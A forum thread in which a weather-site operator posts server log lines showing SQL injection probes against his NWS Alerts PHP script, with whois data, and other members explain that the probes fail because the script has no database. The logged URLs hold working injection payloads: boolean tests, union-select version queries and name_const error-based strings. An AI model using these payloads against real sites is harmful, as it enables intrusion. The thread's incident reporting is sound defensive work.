Topic: Attempted? Hack on NWS Alerts script

[Maumelle Weather]

Curly, Ken, et al.,

Came across the following in my logs for yesterday:

Line 1857: 23.91.70.52 - - [14/Jan/2017:14:29:12 -0500] "GET /wxnws-details.php?a=ARZ042'\" HTTP/1.1" 200 24877 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; yplus 5.6.02b)" 0 0 "off:-:-" 164 1307212

Line 1858: 23.91.70.52 - - [14/Jan/2017:14:29:14 -0500] "GET /wxnws-details.php?a=ARZ042 HTTP/1.1" 200 24870 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 215 343855

Line 1859: 23.91.70.52 - - [14/Jan/2017:14:29:14 -0500] "GET /wxnws-details.php?a=ARZ0422121121121212.1 HTTP/1.1" 200 24915 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; InfoPath.1)" 0 0 "off:-:-" 182 347281

Line 1860: 23.91.70.52 - - [14/Jan/2017:14:29:15 -0500] "GET /wxnws-details.php?a=ARZ042%20and%201%3D1 HTTP/1.1" 200 24695 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 206 359951

Line 1861: 23.91.70.52 - - [14/Jan/2017:14:29:15 -0500] "GET /wxnws-details.php?a=ARZ042%20and%201%3E1 HTTP/1.1" 200 24671 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 229 368230

Line 1862: 23.91.70.52 - - [14/Jan/2017:14:29:16 -0500] "GET /wxnws-details.php?a=ARZ042%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 24862 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 218 371431

Line 1863: 23.91.70.52 - - [14/Jan/2017:14:29:16 -0500] "GET /wxnws-details.php?a=ARZ042%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 24687 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 0 "off:-:-" 247 346981

Line 1864: 23.91.70.52 - - [14/Jan/2017:14:29:17 -0500] "GET /wxnws-details.php?a=ARZ042\"%20and%20\"x\"%3D\"x HTTP/1.1" 200 24868 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)" 0 0 "off:-:-" 249 330620

Line 1865: 23.91.70.52 - - [14/Jan/2017:14:29:17 -0500] "GET /wxnws-details.php?a=ARZ042%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 24671 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 241 344537

Line 1866: 23.91.70.52 - - [14/Jan/2017:14:29:18 -0500] "GET /wxnws-details.php?a=ARZ042%20AND%201=1 HTTP/1.1" 200 24917 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial" 0 0 "off:-:-" 157 362337

Line 1873: 23.91.70.52 - - [14/Jan/2017:14:29:19 -0500] "GET /wxnws-details.php?a=ARZ042999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 HTTP/1.1" 200 24911 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 283 373269

Line 1874: 23.91.70.52 - - [14/Jan/2017:14:29:20 -0500] "GET /wxnws-details.php?a=ARZ04299999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x HTTP/1.1" 200 24880 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; SV1; snprtz|S04087544802137; .NET CLR 1.1.4322)" 0 0 "off:-:-" 274 351602

Line 1875: 23.91.70.52 - - [14/Jan/2017:14:29:20 -0500] "GET /wxnws-details.php?a=ARZ04299999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x HTTP/1.1" 200 25028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)" 0 0 "off:-:-" 300 348564

Line 1876: 23.91.70.52 - - [14/Jan/2017:14:29:21 -0500] "GET /wxnws-details.php?a=ARZ042%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 HTTP/1.1" 200 24688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)" 0 0 "off:-:-" 359 357790

Line 1877: 23.91.70.52 - - [14/Jan/2017:14:29:21 -0500] "GET /wxnws-details.php?a=ARZ042%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x HTTP/1.1" 200 24850 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 0 "off:-:-" 394 343385

Line 1878: 23.91.70.52 - - [14/Jan/2017:14:29:22 -0500] "GET /wxnws-details.php?a=ARZ042%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x HTTP/1.1" 200 24871 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 365 333894

Line 1879: 23.91.70.52 - - [14/Jan/2017:14:29:22 -0500] "GET /wxnws-details.php?a=ARZ042' HTTP/1.1" 200 24698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.3.04b)" 0 0 "off:-:-" 201 345922

Whois IP Information:


NetRange:       23.91.64.0 - 23.91.79.255
CIDR:           23.91.64.0/20
NetName:        ASO-239164-20
NetHandle:      NET-23-91-64-0-1
Parent:         NET23 (NET-23-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS36444, AS36024, AS30496
Organization:   A Small Orange LLC (SOL-21)
RegDate:        2013-08-29
Updated:        2014-06-13
Comment:        http://www.asmallorange.com
Comment:        877-283-2612
Comment:        email@asmallorange.com
Ref:            https://whois.arin.net/rest/net/NET-23-91-64-0-1


OrgName:        A Small Orange LLC
OrgId:          SOL-21
Address:        2500 Ridgepoint Drive
City:           Austin
StateProv:      TX
PostalCode:     78754
Country:        US
RegDate:        2012-06-11
Updated:        2014-10-28
Ref:            https://whois.arin.net/rest/org/SOL-21


For those who use this script, if you are able to check your sever logs, please do. Plus, if you are able, add them to your .htaccess file.

This is the first time I've seen a deliberate attempt on the NWS Alerts script. Things like this are the reason I check the server logs daily. Needless to say the CIDR was added to my .htaccess file.

John

[Jáchym]

Looks like an attempt for an SQL injection, however if this script is not connected to an SQL based db (which I think it isnt) and one that is not protected against this (hopefully everyone knows about this sort of attack), it should not do any harm.

In this particular case I think the script only uses the GET parameter to get the location for warnings so if you send it commands like this, it will simply not find any warnings for this

[saratogaWX]

Looks like an attempt for an SQL injection, however if this script is not connected to an SQL based db (which I think it isnt) and one that is not protected against this (hopefully everyone knows about this sort of attack), it should not do any harm.

In this particular case I think the script only uses the GET parameter to get the location for warnings so if you send it commands like this, it will simply not find any warnings for this

I agree with Jachym .. a 'rattling the doorknob' test.  Since there's no SQL behind that script, the compromise attempt will fail.

I see this kind of thing on my site all the time from too many IPs to block.  I just consider it background noise. 

[Maumelle Weather]

Thanks for the information and explanation Jachym and Ken. Learned something new.

John